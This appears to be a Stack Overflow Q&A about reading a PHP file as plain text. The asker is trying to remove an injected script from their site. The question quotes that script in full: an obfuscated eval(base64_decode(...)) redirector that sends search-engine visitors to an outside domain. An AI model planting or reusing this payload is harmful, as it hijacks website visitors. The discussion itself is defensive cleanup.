# How to read data from php file by using PHP?

Tags: php, readfile

I want to use php code in file A.php to read data of an other php file B.php. So the all php scripts in B.php won't execute and it's just the string.

Unfortunately, the data in B.php is executing when I read it in my A.php.

This is the code in A.php :

```
$handle = @fopen('B.php', 'r') or print " ---> cannot read B.php!";
$filesize = @filesize('B.php');
$str = $filesize ? @fread($handle, $filesize) : null;
@fclose($handle);

if (!$str) {
    echo 'B.php is empty!';
    exit;
}
else {
    //TODO continue process
}
```

This is the code in B.php :

```
<?php       eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vd3d3LnN0bHAuNHB1LmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9"));?>
```

**NOTE** : The B.php file cannot change. My code is in A.php

**UPDATE** : The data in B.php didn't execute when I read it from A.php. But how could I print the data out? because I use print it by `echo $str`, nothing is display in the browser.

Comment: Why do you think the code is being executed?

Comment: when i print $str it's nothing

Comment: oh, it's really not execute! thanks deceze and xdazz. but i can not print it out! :(

Comment: That (B.php) is a malicious redirector. It redirects traffic from certain sources to it's target domain.

Comment: that why I'm trying to write a php script to remove it from my php files.

Comment: Just grep for anything starting "eval(base" and then edit each file individually - I had it come up on one of my hosted sites, annoyed the heck out of me, it had been placed in my word press template and my main index, thankfully nothing else.

Comment: Nothing displays in the browser **because `<?php` looks like an HTML tag!** Look at the Source of the page.

Comment: I was completed my script to remove every things that have sub string like string in B.php file.

Answer (score 6):

The code won't be executed except you included that file.

PS: use `file_get_contents` will be much simple.

```
$str = file_get_contents('B.php');
```

Answer (score 0):

Try using [file_get_contents](http://uk.php.net/file_get_contents) to get a plain string of Bs contents

Answer (score 0):

To get all file lines into array use this.

```
$data = file($filename, FILE_IGNORE_NEW_LINES);
```